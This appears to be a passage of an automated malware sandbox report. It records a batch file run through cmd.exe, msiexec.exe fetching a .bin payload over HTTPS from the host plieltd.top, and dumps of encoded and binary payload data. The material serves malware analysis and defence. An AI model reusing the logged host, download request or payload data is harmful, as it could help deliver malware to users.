                                                    2024-10-22 05:02:01 UTC1369INData Raw: 55 30 30 47 74 70 4a 59 36 4b 6d 56 74 5a 68 30 2b 6e 36 6f 30 68 4c 2f 67 5a 49 52 32 37 4d 42 33 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 79 53 68 61 62 45 67 66 7a 77 30 64 52 31 72 59 71 4c 66 77 51 49 43 55 74 70 65 63 36 61 54 38 37 4c 6e 33 64 33 6e 44 2f 6f 74 39 4b 33 6e 79 2f 53 76 32 64 2f 4b 6d 63 6e 64 35 4b 30 77 5a 6d 42 47 42 6e 34 72 41 38 6e 65 4b 4a 44 46 48 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 5a 33 32 50 58 4b 50 53 67 5a 39 65 59 71 45 46 49 57 51 58 31 43 46 66 78 52 49 4a 54 31 39 49 4b 4a 7a 56 33 67 72 39 69 66 42 42 75 37 67 45 42 34 44 72 7a 31 79 77 39 4c 43 6c 56 31 43 42 46 47 62 37 43 2b 33 66 35 46 34 4c 57
                                                    Data Ascii: U00GtpJY6KmVtZh0+n6o0hL/gZIR27MB3eSv2d3kr9nd5K/Z3eSv2d3kr9nd5K/Z3yShabEgfzw0dR1rYqLfwQICUtpec6aT87Ln3d3nD/ot9K3ny/Sv2d/Kmcnd5K0wZmBGBn4rA8neKJDFHeSv2d3kr9nd5K/Z3eSv2d3kr9nd5K/Z3eZ32PXKPSgZ9eYqEFIWQX1CFfxRIJT19IKJzV3gr9ifBBu7gEB4Drz1yw9LClV1CBFGb7C+3f5F4LW
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 39 74 41 61 61 61 4c 6d 46 30 34 36 35 6e 37 43 50 78 4c 32 77 30 4d 72 7a 71 39 4a 4f 54 6e 55 35 42 43 4f 53 77 63 73 57 55 36 63 75 64 2b 54 68 74 48 66 41 75 54 36 42 70 58 31 48 78 59 50 54 44 63 52 32 47 46 41 72 71 72 43 55 38 54 6c 75 51 72 34 48 39 4c 44 6b 76 46 2b 4a 63 4e 79 31 4b 37 66 71 67 51 5a 41 66 6a 39 39 72 76 56 61 32 46 48 71 68 7a 42 50 34 6a 55 39 6f 74 55 52 67 71 78 66 57 72 2b 6e 79 4c 67 36 76 7a 52 67 6d 70 2b 65 30 37 74 6d 6a 4c 6d 4b 4e 42 53 76 4a 4c 5a 46 4f 6b 69 31 79 58 74 62 65 75 7a 35 77 54 39 48 32 33 58 5a 30 74 55 4b 50 64 4e 7a 37 30 6e 71 67 69 32 45 38 69 69 4c 66 67 66 30 70 2f 4c 69 64 52 34 76 68 74 6e 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b
                                                    Data Ascii: 9nd5K/Z3eSv2d3kr9tAaaaLmF0465n7CPxL2w0Mrzq9JOTnU5BCOSwcsWU6cud+ThtHfAuT6BpX1HxYPTDcR2GFArqrCU8TluQr4H9LDkvF+JcNy1K7fqgQZAfj99rvVa2FHqhzBP4jU9otURgqxfWr+nyLg6vzRgmp+e07tmjLmKNBSvJLZFOki1yXtbeuz5wT9H23XZ0tUKPdNz70nqgi2E8iiLfgf0p/LidR4vhtnd3kr9nd5K/Z3eSv2d3k
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 36 48 70 63 6e 6c 30 72 66 4f 36 63 5a 37 42 78 63 4a 69 75 31 48 35 49 7a 42 7a 6b 38 70 6d 50 38 45 35 76 4e 50 61 42 6d 59 42 42 6b 65 4c 59 54 6b 75 75 74 70 79 39 4d 33 62 56 50 6a 47 4c 35 55 78 68 7a 71 5a 64 37 47 63 61 50 43 59 2b 4d 56 32 4a 4e 45 68 64 34 48 51 70 33 77 73 2b 4e 30 39 75 31 4c 6d 66 33 45 55 58 4c 78 65 69 39 66 78 62 4d 75 37 57 33 39 4d 6a 68 63 68 6f 44 63 72 64 41 51 55 4b 32 6f 41 79 4e 6a 57 36 62 59 43 2b 69 65 71 77 6c 4e 69 36 43 68 50 2b 42 2f 53 56 6f 35 63 41 2f 5a 4e 44 33 48 2f 4f 58 4b 6b 7a 63 74 57 4f 6c 6e 34 32 63 67 4e 34 66 64 33 68 66 43 50 6f 6f 58 77 4b 61 39 43 31 63 76 35 64 6d 58 36 54 57 6f 73 47 43 34 5a 6f 62 65 43 55 31 39 33 56 78 34 34 75 70 45 74 43 6f 4f 5a 69 65 55 2f 53 70 52 4b 61 69 6b 30
                                                    Data Ascii: 6Hpcnl0rfO6cZ7BxcJiu1H5IzBzk8pmP8E5vNPaBmYBBkeLYTkuutpy9M3bVPjGL5UxhzqZd7GcaPCY+MV2JNEhd4HQp3ws+N09u1Lmf3EUXLxei9fxbMu7W39MjhchoDcrdAQUK2oAyNjW6bYC+ieqwlNi6ChP+B/SVo5cA/ZND3H/OXKkzctWOln42cgN4fd3hfCPooXwKa9C1cv5dmX6TWosGC4ZobeCU193Vx44upEtCoOZieU/SpRKaik0
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 39 6e 64 35 6d 5a 37 2b 31 4e 45 38 66 56 37 44 56 55 70 59 31 62 65 2b 36 33 2f 2f 69 33 50 44 4d 70 68 39 4b 36 48 49 2b 79 4b 49 49 76 6a 63 49 75 34 57 56 48 65 59 6a 34 4c 45 62 2f 6a 63 4b 67 79 35 7a 58 65 77 50 55 67 58 66 79 6d 33 66 35 64 34 45 32 74 4f 76 6c 50 31 69 44 4d 4e 47 52 6b 48 77 56 4e 53 30 6b 7a 75 6b 78 63 44 7a 62 57 58 70 79 37 31 6c 57 71 41 65 52 56 46 52 73 54 6a 61 74 54 43 79 30 43 70 6b 44 30 66 6f 4e 63 4f 50 35 4f 56 55 71 43 73 62 42 2b 75 4c 53 2f 35 31 37 51 6f 78 32 47 41 36 69 43 71 47 48 41 44 75 4f 48 32 6c 7a 49 30 77 6a 6d 71 41 46 31 44 66 2f 66 2b 7a 4b 58 33 64 33 6d 56 63 72 4d 30 57 6a 70 61 47 33 73 72 53 43 68 44 6d 59 6d 78 46 35 53 50 51 53 54 36 4c 58 51 64 32
                                                    Data Ascii: d5K/Z3eSv2d3kr9nd5mZ7+1NE8fV7DVUpY1be+63//i3PDMph9K6HI+yKIIvjcIu4WVHeYj4LEb/jcKgy5zXewPUgXfym3f5d4E2tOvlP1iDMNGRkHwVNS0kzukxcDzbWXpy71lWqAeRVFRsTjatTCy0CpkD0foNcOP5OVUqCsbB+uLS/517Qox2GA6iCqGHADuOH2lzI0wjmqAF1Df/f+zKX3d3mVcrM0WjpaG3srSChDmYmxF5SPQST6LXQd2
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 52 74 4b 6d 4f 6e 35 43 4b 42 6d 65 47 43 72 31 63 4a 79 6c 6c 54 34 65 6d 64 48 33 7a 2f 67 66 30 72 48 4b 6e 43 6f 6e 45 54 37 62 74 53 4f 71 32 6c 4f 70 4b 6d 35 4e 2b 42 2f 53 4b 62 49 6f 56 33 69 2b 48 63 56 33 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 65 53 76 32 64 33 6b 72 39 6e 64 35 4b 2f 5a 33 31 57 7a 35 31 57 71 4a 70 59 6a 36 47 61 73 5a 76 70 68 55 7a 4a 73 4a 64 31 74 64 4e 78 5a 65 2b 48 70 50 41 50 57 39 6a 76 61 49 37 71 68 47 2b 61 6f 66 38 5a 54 63 47 2f 61 51 42 78 4c 59 63 33 74 71 2f 70 6b 69 2f 75 72 39 34 34 70 6d 75 46 30 38 4a 6a 6a 32 66 73 73 44 64 6f 6b 77 47 4f 4b 38 74 54 6f 4f 6c 31 54 58 5a 4b 4b 54 35 7a 76 6c 32 52 4f 67 6a 2f 44 78 33 2f 6e 61 70 38
                                                    Data Ascii: 2d3kr9nd5K/Z3eSv2d3krRtKmOn5CKBmeGCr1cJyllT4emdH3z/gf0rHKnConET7btSOq2lOpKm5N+B/SKbIoV3i+HcV3eSv2d3kr9nd5K/Z3eSv2d3kr9nd5K/Z31Wz51WqJpYj6GasZvphUzJsJd1tdNxZe+HpPAPW9jvaI7qhG+aof8ZTcG/aQBxLYc3tq/pki/ur944pmuF08Jjj2fssDdokwGOK8tToOl1TXZKKT5zvl2ROgj/Dx3/nap8
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 5a 58 66 30 58 31 42 36 68 2f 30 61 47 52 36 75 59 65 6d 76 6d 76 76 5a 58 30 32 35 77 72 42 4a 43 46 48 63 55 67 43 6f 55 75 53 39 31 45 30 30 4d 5a 44 65 44 7a 75 70 38 71 6c 79 66 65 4c 79 4b 76 5a 33 38 4c 59 49 64 6e 6b 72 54 59 68 32 41 36 72 32 69 72 31 67 39 55 72 6e 4b 4e 59 4f 4e 51 79 71 59 6e 78 57 68 56 75 74 66 45 70 48 78 64 39 75 65 73 6d 45 43 74 71 4c 65 71 6b 44 6e 31 50 53 65 37 57 78 5a 33 58 59 62 76 61 4b 38 77 77 70 4b 6e 68 4e 74 59 76 50 53 2f 61 4b 71 54 62 4b 53 71 6f 46 63 43 6e 57 34 50 61 53 52 44 4c 30 6e 61 6f 46 72 2b 55 4c 51 69 66 6c 6f 68 5a 32 59 62 5a 7a 68 41 73 73 6f 6e 68 6c 57 52 64 45 4a 49 35 59 2b 42 65 36 74 52 71 5a 6b 2b 71 6b 42 35 58 7a 51 69 31 57 34 42 70 74 68 67 76 7a 37 74 4c 35 79 37 75 54 4b 66 47
                                                    Data Ascii: ZXf0X1B6h/0aGR6uYemvmvvZX025wrBJCFHcUgCoUuS91E00MZDeDzup8qlyfeLyKvZ38LYIdnkrTYh2A6r2ir1g9UrnKNYONQyqYnxWhVutfEpHxd9uesmECtqLeqkDn1PSe7WxZ3XYbvaK8wwpKnhNtYvPS/aKqTbKSqoFcCnW4PaSRDL0naoFr+ULQiflohZ2YbZzhAssonhlWRdEJI5Y+Be6tRqZk+qkB5XzQi1W4Bpthgvz7tL5y7uTKfG
                                                    2024-10-22 05:02:01 UTC1369INData Raw: 79 41 48 77 35 30 2f 74 52 4e 43 35 43 2b 79 2f 43 2b 33 66 35 46 77 4c 57 74 4f 69 56 7a 68 62 5a 58 65 57 47 6a 33 37 69 45 78 78 74 39 4e 37 59 76 54 73 55 48 4c 6a 6b 45 58 57 33 55 62 39 45 51 38 55 65 47 67 4c 51 34 4e 42 71 38 6c 4b 55 44 67 72 6a 66 34 45 38 73 61 62 44 36 44 33 66 6c 54 38 73 38 4d 6a 36 58 4d 58 5a 5a 53 73 50 6a 59 74 56 6c 47 66 33 65 45 37 76 48 6d 71 50 6a 59 70 6e 43 6f 36 48 65 45 32 57 53 73 2b 43 69 33 66 35 5a 77 4d 6d 74 4f 73 46 33 69 45 45 36 64 4c 30 56 74 37 44 71 56 6f 34 30 5a 39 69 2b 67 6c 74 6a 37 56 65 77 7a 5a 6e 57 30 4b 37 2b 34 57 72 39 46 7a 49 52 47 6e 37 74 38 61 47 38 51 38 6a 2f 66 69 50 67 43 48 36 34 38 4c 76 33 77 72 66 63 42 49 6a 56 34 2f 42 59 4a 69 49 61 67 61 31 39 34 4b 2f 61 37 38 6a 75 48
                                                    Data Ascii: yAHw50/tRNC5C+y/C+3f5FwLWtOiVzhbZXeWGj37iExxt9N7YvTsUHLjkEXW3Ub9EQ8UeGgLQ4NBq8lKUDgrjf4E8sabD6D3flT8s8Mj6XMXZZSsPjYtVlGf3eE7vHmqPjYpnCo6HeE2WSs+Ci3f5ZwMmtOsF3iEE6dL0Vt7DqVo40Z9i+gltj7VewzZnW0K7+4Wr9FzIRGn7t8aG8Q8j/fiPgCH648Lv3wrfcBIjV4/BYJiIaga194K/a78juH


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449737104.21.56.1894434348C:\Windows\SysWOW64\msiexec.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-22 05:02:33 UTC178OUTGET /sNFAyMOQkRdGglJM44.bin HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: plieltd.top
                                                    Cache-Control: no-cache
                                                    2024-10-22 05:02:33 UTC986INHTTP/1.1 200 OK
                                                    Date: Tue, 22 Oct 2024 05:02:33 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 494656
                                                    Connection: close
                                                    Last-Modified: Tue, 22 Oct 2024 01:13:42 GMT
                                                    ETag: "78c40-625067aea258c"
                                                    Cache-Control: max-age=14400
                                                    CF-Cache-Status: REVALIDATED
                                                    Accept-Ranges: bytes
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zX6qMh4wR1ocgWnIGeEwte9kpi3UGGVkpO7%2FoRG1aD6YYPVjRBVJy2m7jfOVxaAH%2BsAmfcGr8HS9RCkmqTgVRMNWYJQKiCq2M7IQ%2FM8gLGUAygWsNiuwMcK48qjqvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                    X-Content-Type-Options: nosniff
                                                    Server: cloudflare
                                                    CF-RAY: 8d66ef912ec52e7e-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1174&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=816&delivery_rate=2174174&cwnd=249&unsent_bytes=0&cid=6a5db98088e43915&ts=837&x=0"
                                                    2024-10-22 05:02:33 UTC383INData Raw: 45 36 7e 5e 61 67 ac 2f 82 46 fb 4d 1d 84 57 4d bf e9 00 a2 87 f5 da f7 4c 51 e4 ca 40 64 de b6 ee 65 5f 08 d5 c9 e0 5b c9 af f8 ef 6a 46 3e 3c ce 88 36 f7 3b 2b 80 32 b6 e2 e3 c2 84 03 5f 73 c1 51 55 a8 f3 f4 46 92 68 44 d3 fe 31 70 84 90 e0 dd ff 41 2f 20 30 f5 3b da 2a 51 ca bb 23 6e 64 2c ee 84 d6 b5 56 8a 6c 74 04 8b f6 50 98 d0 d2 a8 22 35 b2 ff 38 92 b1 c9 6a 02 35 71 8b 28 6f 29 b3 b5 b1 39 73 54 79 76 c8 2a cd ae 1b 1e de be 60 87 e1 cb c5 6c 56 6e f8 62 6a dc 8a a9 f0 ce f0 84 16 5f a2 c8 1b b2 b9 91 66 9b b6 81 4c 14 15 0a 21 f8 94 2a 02 ef 98 48 61 20 09 82 40 9d 7b c4 0a b2 14 09 09 c1 73 69 3b 95 41 c9 5d cd a1 18 b8 f3 91 bc 12 ec ec 2e a9 21 f5 0a 9a cb 95 17 98 b8 73 20 12 25 df 9f 28 1e 37 ea f2 f4 9d 1a 33 8c 41 31 96 d3 e8 69 08 78 a4
                                                    Data Ascii: E6~^ag/FMWMLQ@de_[jF><6;+2_sQUFhD1pA/ 0;*Q#nd,VltP"58j5q(o)9sTyv*`lVnbj_fL!*Ha @{si;A].!s %(73A1ix
                                                    2024-10-22 05:02:33 UTC1369INData Raw: f5 1b 2e 57 2d b4 40 0c 81 2b 76 6f 70 32 d0 d2 11 30 1b 09 c9 e1 ae d0 57 a1 44 49 be ca 96 cf fc a7 d4 dd ba b5 c7 50 30 39 c4 e6 21 90 15 c4 0d 85 bc de cf 3b 80 9f ab 38 d3 0a d4 27 eb f6 bb 45 5c 4f 87 74 c1 b5 36 2e c3 c1 cb cd 46 e0 91 0f de 1c 45 e9 58 62 b4 74 38 7e ab 40 1d 8f 36 2c c2 a8 6c 81 c6 43 de 26 39 e1 9a 9a b0 13 3f fc f2 55 01 aa 74 73 60 96 61 57 ed 57 88 7a 4a f8 e9 94 f8 9f 7b 5a 16 5a 01 8b 25 1b 61 30 b3 50 5c 83 22 05 40 69 e0 b6 1d 03 4b 10 07 eb a3 50 10 45 7a fb fa 2d a5 cd 40 b5 b8 e0 83 ee 74 b5 e2 e2 de 6e f2 ff 68 2c 24 79 4b 9b 8e 6a 73 92 9a 47 f2 52 f1 e8 32 88 21 d4 d1 bb 85 4e a2 02 cd 33 4c f1 89 23 66 4c 8a 65 aa 84 64 34 29 12 cc 42 fe 6e 6a cc 61 ea f7 1a 4f 22 ea 3c 1d f7 15 9a 04 09 f0 71 a7 c1 83 b2 26 a6 65
                                                    Data Ascii: .W-@+vop20WDIP09!;8'E\Ot6.FEXbt8~@6,lC&9?Uts`aWWzJ{ZZ%a0P\"@iKPEz-@tnh,$yKjsGR2!N3L#fLed4)BnjaO"<q&e
                                                    2024-10-22 05:02:33 UTC1369INData Raw: de 16 42 10 43 62 de 26 d5 3a 43 6a 98 22 b8 06 6d 47 3c 45 48 2d f5 33 e9 1a 89 73 0d 5b ad 55 eb b5 98 05 c7 32 22 65 53 2c a6 00 8a bb cb 0a a5 55 df 71 eb 5a de d6 14 c1 4f 82 f7 85 0c f4 0a 08 27 a1 c0 1f 95 07 c8 43 4f a0 d1 16 f8 99 18 95 55 d0 ee 14 56 55 51 d6 a1 a0 91 ab 6a d1 ba 7f 8c b4 4d 4e de c4 9f 89 94 c8 2a 16 01 68 52 32 e6 a4 0f 57 da 4f bc 2c 0b bf 97 e5 44 fa c3 d0 84 c7 c2 bf 07 d9 3c ab 27 f0 81 6a 51 fa 4d 55 25 c4 68 79 5c 64 d9 e2 5c 74 7f 6a ed f4 f9 d3 0a b1 b8 fd d8 8a a7 67 2c 26 34 13 66 37 a6 11 12 a3 86 39 cd 15 ec 1e 5e 47 03 3c 86 b0 be 20 73 bd ce 8e 86 1d 15 7e 69 83 66 4a f0 96 51 e8 1e 88 70 67 19 7c 01 46 b0 92 df af 7c 34 68 15 d1 28 73 44 1e 5d ae 8a 28 4b 55 24 14 4d c0 34 34 66 06 01 af db ce 59 59 22 6c b1 5f
                                                    Data Ascii: BCb&:Cj"mG<EH-3s[U2"eS,UqZO'COUVUQjMN*hR2WO,D<'jQMU%hy\d\tjg,&4f79^G< s~ifJQpg|F|4h(sD](KU$M44fYY"l_
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 5c fa 3a e3 1a 88 38 c8 8f ed a0 9c e8 8a ea 02 da dc 12 e1 54 60 9c 8f e8 d3 16 91 d9 89 04 55 b5 2a 93 e1 e0 44 7c 99 8a 17 ee 93 f1 dd dc f5 42 91 6d c8 8a f0 96 a7 d7 fb ae 01 e0 10 81 26 31 d7 5d 55 65 63 47 af 6b 12 64 73 f8 ce 93 a6 92 86 93 58 21 8d 44 4e 2b 9e ef 55 95 31 65 b5 58 05 be 07 b0 af 81 d4 bf 7f a7 55 4c c2 11 38 bc d9 e4 b9 20 9e cb d7 51 a2 fc 7c f6 9e 1c 49 bc e4 7f 0b 01 1a 06 e8 5e 3c a4 89 11 a5 80 80 22 3a 62 fb 84 33 69 9f 34 3e d3 fd e9 b9 48 19 d3 8f 9d 58 1c 04 5e be 56 4d 6a d6 2a f8 d9 ae 8e 67 4d 16 9c 78 9b 54 23 5a 2d 40 d5 69 0b b3 70 6f 19 9e 1d c2 8c b2 2a d2 e1 b8 05 67 c1 28 ec 30 49 fa b9 f2 4c 1d e1 7d 48 55 43 3d ef 79 29 32 29 a2 da b0 6c 6c a0 d1 69 c0 d6 07 62 72 b3 fb 53 43 54 2d 0d 22 bd cf ae 29 21 14 db
                                                    Data Ascii: \:8T`U*D|Bm&1]UecGkdsX!DN+U1eXUL8 Q|I^<":b3i4>HX^VMj*gMxT#Z-@ipo*g(0IL}HUC=y)2)llibrSCT-")!
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 92 9a 47 98 02 a1 00 a6 04 22 d4 52 7f 95 c3 26 08 19 56 34 85 04 6f 42 91 ab 88 80 87 74 34 41 32 e0 01 fe e3 3a e8 4d 67 7b 3e c3 22 ea 3c f5 86 8a 9b 04 79 9a 2d 7d 8b bc 91 47 5f 48 b4 19 7a 50 73 cd b4 3e 80 45 05 cd 75 ca ce 8d f0 11 cd 56 5c 95 8c e4 1e 91 36 70 90 61 d2 31 b7 73 91 ec ee 2b 1e ff 8e 95 c3 db 89 e0 55 dd cc 7d e0 07 31 4d 8a d6 f3 28 77 68 89 10 0b a3 e0 a7 97 ad bd 7a e0 f6 c6 7e b5 ef b9 35 89 2d 0c e9 03 4d 29 86 63 74 4e f4 06 2e 2b 19 e5 3d e7 d7 19 1b 0a 37 0d 08 dc 93 b8 5b ef 62 28 48 42 fa b6 85 76 16 99 53 45 5c 35 8b d6 cf 63 f9 24 21 0a 7a 3d 45 ac 53 ad 3c a2 3c 21 25 32 81 20 9c 30 dc 28 0d ef 64 6e 97 38 63 08 49 2e de 34 8e fb 48 4e ff 24 b8 40 74 46 42 75 2c df 99 14 ba db 69 43 c8 0c 59 27 30 06 56 30 7b 9c 6a 52
                                                    Data Ascii: G"R&V4oBt4A2:Mg{>"<y-}G_HzPs>EuV\6pa1s+U}1M(whz~5-M)ctN.+=7[b(HBvSE\5c$!z=ES<<!%2 0(dn8cI.4HN$@tFBu,iCY'0V0{jR
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 5e c9 36 ee c6 7f 1a 15 27 f7 b2 ed 3d e0 14 12 e8 f6 ff 37 43 15 9f f8 00 f5 95 37 27 48 df f9 49 12 42 2d 3f 8e 08 bf dd 4b ca 8e 64 eb da 7e 3e 89 31 65 be 73 51 ca 00 9a cb ff 29 f0 29 ac 39 c0 a7 20 68 fe d8 d4 e4 f3 25 7b 01 0f 8d 23 bc d0 56 c2 84 10 d7 fe ce 04 c0 b4 54 82 a1 83 2b 20 66 7e 8a 32 2c ae 35 44 73 e5 ac c4 bf 80 d6 b5 06 01 a2 9c f2 75 09 af 13 18 3a f2 26 35 b2 74 74 b6 bd 99 82 20 29 70 8b a3 25 12 01 e5 73 89 7a ca 0d 98 9e ed 7c ab 5b fd 6e 46 8f 1f d7 a0 a2 1e bc eb 53 ce 88 cf e4 ce f7 cd 7a 06 c8 d2 28 2d 33 9a 86 3a ed 3c 00 5c de 84 21 e4 c4 1d 44 dd d9 10 c8 a0 36 d2 f6 7d cf 22 cf 02 6a 40 0f 8a be 24 2e e7 f8 44 c1 5f 62 b6 79 99 b3 01 4d cf ee 6a 90 00 cd f0 cb f5 98 b2 4e e2 06 4a ca 53 53 47 0e c7 61 8f 2e 7c be b0 73
                                                    Data Ascii: ^6'=7C7'HIB-?Kd~>1esQ))9 h%{#VT+ f~2,5Dsu:&5tt )p%sz|[nFSz(-3:<\!D6}"j@$.D_byMjNJSSGa.|s
                                                    2024-10-22 05:02:33 UTC1369INData Raw: f8 56 d8 68 b1 77 7c ca 39 d5 1b ac 70 12 cc 10 00 46 9f 22 d4 5c f5 18 47 c8 29 ec 68 e3 20 88 b2 d7 aa a6 2e 9d a2 48 c4 db bc c1 8d a2 7c c5 c1 a3 4c 96 d6 d9 62 fb 27 b6 a6 d0 60 ff 8f a8 e9 41 ad dc 2a 44 62 be 3e e1 6e 56 d6 7d 67 28 ae 44 97 d0 8d 68 c5 3c 2e 6c f8 53 96 c1 5c 39 ea eb f2 62 4f 8d 4c 1a 15 83 25 d9 99 93 b7 b9 ca 14 37 5e 12 60 3f f9 39 cc ae 3c c1 d2 74 b4 e0 c4 77 33 e0 01 89 9c 21 08 61 e7 23 0a 37 76 89 fb db 13 65 93 0e 07 59 bc 5a 3c 72 b9 f3 66 3c 4c d6 cc e3 b9 a5 12 94 b8 2b 76 d1 63 38 aa 2d c0 a1 c0 e0 f2 e1 96 20 81 30 98 5d 03 3a f9 77 b6 ae 4e 1c e0 a9 c4 33 14 8c cd 66 f9 75 b1 5d 2e 6b 9a 0a bd 2e 0a 48 a4 eb bb 64 a5 87 9f a1 4c 92 19 4e 27 5f fb dd 69 bf fe 5a 8a 34 98 a5 87 19 dc 75 ed da e7 eb 45 93 83 d6 31 52
                                                    Data Ascii: Vhw|9pF"\G)h .H|Lb'`A*Db>nV}g(Dh<.lS\9bOL%7^`?9<tw3!a#7veYZ<rf<L+vc8- 0]:wN3fu].k.HdLN'_iZ4uE1R
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 85 66 80 75 52 6e bf 85 e0 7d 26 65 2e ab 48 fc 7d 32 01 3c 40 2f 4c 41 af c7 02 70 00 8c 71 98 77 98 83 e6 e9 43 d7 d2 31 62 c4 f2 e9 c1 02 58 0e d3 88 4b 33 d9 ae a1 2a 49 8d 09 b5 89 6a 36 a9 6e f7 86 04 22 76 b0 08 df 12 1e 24 67 c5 7b ec 1e 53 cb 77 42 79 88 c1 ef e8 3d c1 f4 02 3f 25 75 5b 44 3d 89 60 92 c5 52 d4 44 85 83 f8 0c b1 22 a6 4f 9b bd e0 35 64 fc 80 d4 78 62 29 e2 83 68 b1 b3 ca 36 95 f7 4f 6b 2e 6c 40 56 4f ec fc b3 33 bc 79 53 3d 97 71 85 f6 cb 3a 18 e3 fa 49 55 ed 52 ab 0f aa 32 0d 7f 53 6a f2 2d a2 7d b1 20 a6 c3 8d 8c 43 cb db 57 1f e3 c8 3b 0d 2c 33 a3 8f 75 2d d0 5d a2 6c 6b 0c 8a 64 5c 03 bb 90 de 17 63 19 0a 11 70 9e a2 b6 99 e9 21 ef 7c 7d cf 9d 1a 49 66 82 80 29 be 54 4d ca ef a2 70 9a 42 e3 95 4b c7 db 4c b9 60 77 17 6b 7a 4e
                                                    Data Ascii: fuRn}&e.H}2<@/LApqwC1bXK3*Ij6n"v$g{SwBy=?%u[D=`RD"O5dxb)h6Ok.l@VO3yS=q:IUR2Sj-} CW;,3u-]lkd\cp!|}If)TMpBKL`wkzN
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 7e 81 1b f9 98 b9 c3 af c8 d9 76 b3 19 fa d1 36 be a8 76 16 50 6b ff 6c 79 68 48 25 8b f2 6e b0 62 89 2a 6a 9c 36 af 19 65 78 b6 62 4d e4 e2 22 f3 f3 d3 16 53 06 10 31 89 ac 84 cc c3 8c 64 79 12 57 3b 58 1a 78 1e 0a ef 3f 44 01 78 88 83 c1 26 fd f8 8d b8 4b 1d f1 4c 66 a5 28 c6 a8 4a 21 7a 19 46 2b b9 d8 a6 0a b7 99 75 b4 d8 93 e7 67 37 3f 11 fd 04 08 6f b0 1f 40 ce 78 a6 92 e6 1c 2d 90 6e 6a 43 ea 0e d8 46 c4 a1 6d 8e 76 11 95 2d 4a 5c d9 01 b0 50 5b d2 97 ca 40 1d 4b 33 b0 52 10 8f 88 97 ea 79 a1 a8 ca 35 40 03 75 e8 e2 b7 8a 42 08 c6 3c 1d db 1e ba c4 aa 26 92 48 68 e8 e0 8b 4c ce 71 bd 86 e1 79 19 64 9b df 69 90 54 87 88 10 ee 65 e4 f2 12 96 11 bb 0a 82 85 c5 a8 fb 56 75 bc 8a ba ca 7f 21 03 5d 2b 35 3c b0 c7 50 bb 38 6f a2 05 94 3a c5 cf 81 bc 37 3f
                                                    Data Ascii: ~v6vPklyhH%nb*j6exbM"S1dyW;Xx?Dx&KLf(J!zF+ug7?o@x-njCFmv-J\P[@K3Ry5@uB<&HhLqydiTeVu!]+5<P8o:7?
                                                    2024-10-22 05:02:33 UTC1369INData Raw: 4a 50 5a d0 df 31 25 9a 9c 03 01 00 03 49 1e 3e ee 3e 95 1d 56 13 f9 e4 58 af a4 30 0a 45 29 cb a2 dd e7 a6 61 49 27 d6 43 65 23 f3 22 3c a5 41 f0 d3 89 9d 7c 5f 3c 18 91 d7 7e 4d 1d 51 31 08 88 6e d4 96 36 42 3c 2d 98 5a 82 1d 58 23 75 24 79 2f 4a ef a8 fe e2 c0 63 86 66 68 c9 36 2b 59 9c 75 ee a4 0e ac c5 8d ae 8b 66 98 58 40 39 d6 cb 09 0c 90 16 00 c3 70 f5 6c ee 6f 7c 70 99 96 67 54 6d a0 05 46 06 d6 6b 0b 00 ce 42 6c 2a eb c7 02 88 58 3c 7d 09 8b a7 53 3d c9 7d 80 dc d8 79 ae bb 49 16 97 e4 19 a6 db e7 e5 a7 47 3a b6 b0 d9 fd 52 a9 8a af e6 f0 fb f3 bd d9 2a 52 d0 02 bb 78 0b e6 c9 b8 3a 8a 98 90 bb 2d 11 dd a8 50 2a b7 7c 21 e5 8e bc 33 20 5d 8a 6c ad 7d 26 8a 89 b9 1a f5 9b f1 a4 1f 8f 0a f9 05 31 42 39 cb 72 78 a5 65 8b 87 81 23 f1 d4 f9 67 21 eb
                                                    Data Ascii: JPZ1%I>>VX0E)aI'Ce#"<A|_<~MQ1n6B<-ZX#u$y/Jcfh6+YufX@9plo|pgTmFkBl*X<}S=}yIG:R*Rx:-P*|!3 ]l}&1B9rxe#g!


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:01:01:56
                                                    Start date:22/10/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" "
                                                    Imagebase:0x7ff796d00000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

